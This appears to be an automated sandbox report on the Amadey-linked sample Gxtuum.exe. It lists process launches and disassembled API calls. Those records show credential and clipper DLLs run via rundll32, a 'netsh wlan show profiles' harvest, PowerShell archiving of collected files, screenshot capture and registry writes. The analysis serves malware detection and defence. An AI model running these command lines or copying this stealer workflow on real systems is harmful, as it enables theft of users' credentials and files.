MD5 hash:	4962575A2378D5C72E7A836EA766E2AD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	01:47:02
Start date:	13/12/2024
Path:	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe"
Imagebase:	0xe0000
File size:	441'344 bytes
MD5 hash:	4962575A2378D5C72E7A836EA766E2AD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 66%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	01:47:02
Start date:	13/12/2024
Path:	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
Imagebase:	0xe0000
File size:	441'344 bytes
MD5 hash:	4962575A2378D5C72E7A836EA766E2AD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	01:47:07
Start date:	13/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main
Imagebase:	0xe60000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	01:47:07
Start date:	13/12/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main
Imagebase:	0x7ff754830000
File size:	71'680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	01:47:07
Start date:	13/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main
Imagebase:	0xe60000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Analysis Process: rundll32.exePID: 3272, Parent PID: 3940

General

Target ID:	6
Start time:	01:47:07
Start date:	13/12/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main
Imagebase:	0x7ff754830000
File size:	71'680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Analysis Process: netsh.exePID: 4888, Parent PID: 1220

General

Target ID:	7
Start time:	01:47:08
Start date:	13/12/2024
Path:	C:\Windows\System32\netsh.exe
Wow64 process (32bit):	false
Commandline:	netsh wlan show profiles
Imagebase:	0x7ff7ce700000
File size:	96'768 bytes
MD5 hash:	6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	01:47:08
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	01:47:08
Start date:	13/12/2024
Path:	C:\Windows\System32\netsh.exe
Wow64 process (32bit):	false
Commandline:	netsh wlan show profiles
Imagebase:	0x7ff7ce700000
File size:	96'768 bytes
MD5 hash:	6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	01:47:08
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	01:47:11
Start date:	13/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	01:47:11
Start date:	13/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll, Main
Imagebase:	0xe60000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	01:47:12
Start date:	13/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 6940, Parent PID: 6944

General

Target ID:	14
Start time:	01:47:12
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	01:47:12
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	01:47:12
Start date:	13/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll, Main
Imagebase:	0xe60000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Analysis Process: Gxtuum.exePID: 6796, Parent PID: 1044

General

Target ID:	20
Start time:	01:48:01
Start date:	13/12/2024
Path:	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
Imagebase:	0xe0000
File size:	441'344 bytes
MD5 hash:	4962575A2378D5C72E7A836EA766E2AD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	01:49:00
Start date:	13/12/2024
Path:	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
Imagebase:	0xe0000
File size:	441'344 bytes
MD5 hash:	4962575A2378D5C72E7A836EA766E2AD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	33.8%
Total number of Nodes:	477
Total number of Limit Nodes:	10

Executed Functions

Function 002E61F0 Relevance: 84.0, APIs: 40, Strings: 7, Instructions: 1737registrywindowfileCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,AA6E0749,AA6E0749), ref: 002E639C
RegQueryValueExA.KERNELBASE(AA6E0749,?,00000000,00000000,?,00000400,?,?,00000000,00000001,AA6E0749,AA6E0749), ref: 002E63CA
RegCloseKey.KERNELBASE(AA6E0749,?,?,00000000,00000001,AA6E0749,AA6E0749), ref: 002E63D6
RegOpenKeyExA.ADVAPI32(80000001,80000001,00000000,000F003F,00000001), ref: 002E64E3
RegSetValueExA.ADVAPI32(80000001,?,00000000,00000002,?,?), ref: 002E6511
RegCloseKey.ADVAPI32(80000001), ref: 002E651A
RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,80000002), ref: 002E663C
RegSetValueExA.ADVAPI32(80000002,?,00000000,00000004,?,00000004), ref: 002E665F

Part of subcall function 002E61F0: RegOpenKeyExA.ADVAPI32(?,00000000), ref: 002E67BD
Part of subcall function 002E61F0: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 002E6894
Part of subcall function 002E61F0: RegEnumValueA.ADVAPI32(?,00000000,?,00001000,00000000,00000000,00000000,00000000), ref: 002E68E0

RegCloseKey.ADVAPI32(80000002), ref: 002E6668
RegCloseKey.ADVAPI32(?), ref: 002E6D5E
GdiplusStartup.GDIPLUS(?,?,00000000,AA6E0749,00000000), ref: 002E6DEA
GetDC.USER32(00000000), ref: 002E6F62
RegGetValueA.ADVAPI32(80000002,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 002E71CD
GetSystemMetrics.USER32(00000000), ref: 002E7226
GetSystemMetrics.USER32(00000000), ref: 002E722F
RegGetValueA.ADVAPI32(80000002,?,00000000), ref: 002E7277
GetSystemMetrics.USER32(00000001), ref: 002E72CA
GetSystemMetrics.USER32(00000001), ref: 002E72D3
CreateCompatibleDC.GDI32(?), ref: 002E72DF
CreateCompatibleBitmap.GDI32(?,?,?), ref: 002E72F4
SelectObject.GDI32(00000000,00000000), ref: 002E7304
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 002E732A
GdipCreateBitmapFromHBITMAP.GDIPLUS(00000000,00000000,?), ref: 002E733E
GdipGetImageEncodersSize.GDIPLUS(00000000,?), ref: 002E735A
GdipGetImageEncoders.GDIPLUS(00000000,00000000,00000000), ref: 002E7387
GdipSaveImageToFile.GDIPLUS(00000000,00000000,?,00000000), ref: 002E740E
SelectObject.GDI32(00000000,?), ref: 002E741B
DeleteObject.GDI32(00000000), ref: 002E7428
DeleteObject.GDI32(?), ref: 002E7430
ReleaseDC.USER32(00000000,?), ref: 002E743A
GdipDisposeImage.GDIPLUS(00000000), ref: 002E7441
GdiplusShutdown.GDIPLUS(?), ref: 002E74E3
GetUserNameA.ADVAPI32(?,?), ref: 002E75BA
LookupAccountNameA.ADVAPI32(00000000,?,?,000000FF,?,?,?), ref: 002E7600
GetSidIdentifierAuthority.ADVAPI32(?), ref: 002E760D
GetSidSubAuthorityCount.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 002E7721
GetSidSubAuthority.ADVAPI32(?,00000000), ref: 002E7748

Strings

image/jpeg, xrefs: 002E73A2
ntdll.dll, xrefs: 002E815D
stoi argument out of range, xrefs: 002E8048
invalid stoi argument, xrefs: 002E8057
, xrefs: 002E8140
NtUnmapViewOfSection, xrefs: 002E8158
(, xrefs: 002E8206

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: Value$Gdip$CloseImageMetricsObjectOpenSystem$AuthorityCreate$BitmapCompatibleDeleteEncodersGdiplusNameQuerySelect$AccountCountDisposeEnumFileFromIdentifierInfoLookupReleaseSaveShutdownSizeStartupUser
String ID: $($NtUnmapViewOfSection$image/jpeg$invalid stoi argument$ntdll.dll$stoi argument out of range
API String ID: 1729688432-36074161
Opcode ID: 2224e40933b5c0a1ba4769a3c1330d861eba33eba85296fc4535f9c0dcdd3c12
Instruction ID: f4c79e4a3db721b159f3bfb4492d1413b11e4411c8cb5561c3a5e24a8c6a8bfa
Opcode Fuzzy Hash: 2224e40933b5c0a1ba4769a3c1330d861eba33eba85296fc4535f9c0dcdd3c12
Instruction Fuzzy Hash: 9FD21471A101589BDB19DF29CC89BEDBB79EF45300F904298E409EB2D2DB749AD0CF91

Function 0030E250 Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,?,0030E24F,?,?,?,?,?,0030F4C2), ref: 0030E272
TerminateProcess.KERNEL32(00000000,?,0030E24F,?,?,?,?,?,0030F4C2), ref: 0030E279
ExitProcess.KERNEL32 ref: 0030E28B

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: cf4ae6b03fbf08a811e6e0229a0068290439a1aec0600956529b8761771a6bf5
Instruction ID: 71c5f65534acc4dc1a81505a58721fc7e244f9752bd296ca354d74fd285e110c
Opcode Fuzzy Hash: cf4ae6b03fbf08a811e6e0229a0068290439a1aec0600956529b8761771a6bf5
Instruction Fuzzy Hash: 00E0B631201208AFCF137BA8DD5994E3B6DEB54781F118C14F805CA171CB35DD91EA40

Function 00323E8F Relevance: 13.8, APIs: 9, Instructions: 273
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00323B48: CreateFileW.KERNELBASE(00000000,00000000,?,00323F38,?,?,00000000,?,00323F38,00000000,0000000C), ref: 00323B65

GetLastError.KERNEL32 ref: 00323FA3
__dosmaperr.LIBCMT ref: 00323FAA
GetFileType.KERNELBASE(00000000), ref: 00323FB6
GetLastError.KERNEL32 ref: 00323FC0
__dosmaperr.LIBCMT ref: 00323FC9
CloseHandle.KERNEL32(00000000), ref: 00323FE9
CloseHandle.KERNEL32(?), ref: 00324136
GetLastError.KERNEL32 ref: 00324168
__dosmaperr.LIBCMT ref: 0032416F

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID:
API String ID: 4237864984-0
Opcode ID: e16734b81dbcc4d910f77522ceebfbe4aecda95ffcffbe6d3f2edfbdd3f56072
Instruction ID: 1b5f9dc3beffe8e7d79fd8ae2ebea2bc4a4f83be1d26b6851a64160b53241d53
Opcode Fuzzy Hash: e16734b81dbcc4d910f77522ceebfbe4aecda95ffcffbe6d3f2edfbdd3f56072
Instruction Fuzzy Hash: 11A16732A001648FCF1F9F68EC517EE3BA5AB0A320F190149F815EF2A1CB399D56CB51

Function 002E89E0 Relevance: 12.9, APIs: 6, Strings: 1, Instructions: 639
sleepthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064,AA6E0749,?,00000000,003294DD,000000FF), ref: 002E8A1C
__Init_thread_footer.LIBCMT ref: 002E8AB6

Part of subcall function 00309E88: EnterCriticalSection.KERNEL32(00348FA8,?,?,002E2E3C,0034CDC4,0032D0C0), ref: 00309E92
Part of subcall function 00309E88: LeaveCriticalSection.KERNEL32(00348FA8,?,?,002E2E3C,0034CDC4,0032D0C0), ref: 00309EC5
Part of subcall function 00309E88: WakeAllConditionVariable.KERNEL32(?,002E2E3C,0034CDC4,0032D0C0), ref: 00309F3C

CreateThread.KERNEL32(00000000,00000000,002E8880,0034C578,00000000,00000000), ref: 002E8B1B
Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?), ref: 002E8B26

Part of subcall function 00309ED2: EnterCriticalSection.KERNEL32(00348FA8,?,?,?,002E2E1C,0034CDC4), ref: 00309EDD
Part of subcall function 00309ED2: LeaveCriticalSection.KERNEL32(00348FA8,?,?,?,002E2E1C,0034CDC4), ref: 00309F1A

Sleep.KERNEL32(000003E8), ref: 002E8EF9

Part of subcall function 002E26A0: ___std_exception_copy.LIBVCRUNTIME ref: 002E26E2

SetCurrentDirectoryA.KERNEL32(00000000,AA6E0749), ref: 002E8FA2

Strings

runas, xrefs: 002E8753

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: CriticalSection$Sleep$EnterLeave$ConditionCreateCurrentDirectoryInit_thread_footerThreadVariableWake___std_exception_copy
String ID: runas
API String ID: 91779485-4000483414
Opcode ID: 0b4cb28305b8e9b7384c90c3a634d73c79f518caef325fb4b93b2ccaa961a437
Instruction ID: bcf4ecfd779cceaf9fef123195ef4d62dfd01874767857951a4833d396ee0196
Opcode Fuzzy Hash: 0b4cb28305b8e9b7384c90c3a634d73c79f518caef325fb4b93b2ccaa961a437
Instruction Fuzzy Hash: 55225971621284AFDB09EF29DC5A79D7B66EF42304F90425CF4049F3C2DB759A908B91

Function 003011A0 Relevance: 6.0, APIs: 4, Instructions: 37
threadsleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 002EC730: Sleep.KERNELBASE(00000096), ref: 002EC6D6
Part of subcall function 002EC730: CreateMutexA.KERNELBASE(00000000,00000000,00347494), ref: 002EC6F4
Part of subcall function 002EC730: GetLastError.KERNEL32 ref: 002EC6FC
Part of subcall function 002EC730: GetLastError.KERNEL32 ref: 002EC70D

Part of subcall function 002E61F0: RegOpenKeyExA.ADVAPI32(?,00000000), ref: 002E67BD
Part of subcall function 002E61F0: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 002E6894

CreateThread.KERNEL32(00000000,00000000,00300F90,00000000,00000000,00000000), ref: 00301166
CreateThread.KERNEL32(00000000,00000000,Function_00021020,00000000,00000000,00000000), ref: 00301177
CreateThread.KERNEL32(00000000,00000000,Function_000210B0,00000000,00000000,00000000), ref: 00301188
Sleep.KERNEL32(00007530), ref: 00301195

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: Create$Thread$ErrorLastSleep$InfoMutexOpenQuery
String ID:
API String ID: 1072900782-0
Opcode ID: 0077a0489091f13b7adae4dae6e5880f97fd531bfa8a9c6b92a97d6872ee7cb4
Instruction ID: 952557ea793571e58f1b5ee128aaca5192def3dab468f6fb23bcd1758c977c2f
Opcode Fuzzy Hash: 0077a0489091f13b7adae4dae6e5880f97fd531bfa8a9c6b92a97d6872ee7cb4
Instruction Fuzzy Hash: 1FF0E531BE935876F13A33E50C17F9AA9084B08FD1F740122F7597E2C598C035605AAF

Function 00323E01 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 00323E64

Strings

w1, xrefs: 00323E03

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: _free
String ID: w1
API String ID: 269201875-3583081367
Opcode ID: 5bf193fee8e13bd601411da2ac5b93692fa8ed646d5c05a249e26dc7ca1745e2
Instruction ID: 53bc4071c663c1f08dc093f5d49f470d77a454f4073c797a91ccd9fb639f2e8c
Opcode Fuzzy Hash: 5bf193fee8e13bd601411da2ac5b93692fa8ed646d5c05a249e26dc7ca1745e2
Instruction Fuzzy Hash: DD018F72C01159AFCF02AFA89C01AEE7FB5FF48300F154165F914E21A1E6318B64DB91

Function 002F1DD0 Relevance: 3.3, APIs: 2, Instructions: 315
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,00000000,?,7FFFFFFF,?,?,0033DC20,00000001), ref: 002F1F94
CreateDirectoryA.KERNELBASE(00000000,00000000,?,?,?,?), ref: 002F20B4

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: CreateDirectoryFileModuleName
String ID:
API String ID: 3341437400-0
Opcode ID: 347855cbe8ca1d759de64aa1e6bc5c89d95c97fb054ff28b5df8e770a13fe007
Instruction ID: 8b0ec8380cb817bfdcab4676ef63eec1c64a9489697407c07906406e425d03e6
Opcode Fuzzy Hash: 347855cbe8ca1d759de64aa1e6bc5c89d95c97fb054ff28b5df8e770a13fe007
Instruction Fuzzy Hash: 99C10371920258DBDF16EB24CC9A7EDBB79AF06300F8041D8E508AB2D2DB715B94CF91

Function 002EE8D0 Relevance: 3.3, APIs: 2, Instructions: 305
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserNameA.ADVAPI32(?,?), ref: 002EE91D
CoInitialize.OLE32(00000000), ref: 002EEC54

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: InitializeNameUser
String ID:
API String ID: 2272643758-0
Opcode ID: 20597399eb4634a6d46576138f11324327089e5c850c08ee8f1c0170cb227aa1
Instruction ID: 598d0375aa525f46382cd9ba2fb1cfc44925e0380983f743e0bd9d0446a4a19e
Opcode Fuzzy Hash: 20597399eb4634a6d46576138f11324327089e5c850c08ee8f1c0170cb227aa1
Instruction Fuzzy Hash: 4BE12470A1526DDBEF20DF25C998BCEBBB5AF05308F5081D9E409A7281C7759A88CF91

Function 002F1080 Relevance: 1.6, APIs: 1, Instructions: 103
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22531792f424969cc256ddd5d46b7f6d161b437f5ac50b9c4ae6c24781b492bd
Instruction ID: 9c78e8e1d877c04db93ea42ba5d2c5822ed3375c410a8862b3d58c0279e217df
Opcode Fuzzy Hash: 22531792f424969cc256ddd5d46b7f6d161b437f5ac50b9c4ae6c24781b492bd
Instruction Fuzzy Hash: A431BF3161124CEFDB05CF68C985BEEBBB5FB48704F504229F905AB2C1D7B59990CB90

Function 003177A2 Relevance: 1.6, APIs: 1, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__wsopen_s.LIBCMT ref: 003177DC

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: baf9273f3ce57b6de155cd42d5114b6ed43218e24c72913c6c4809b9a202d775
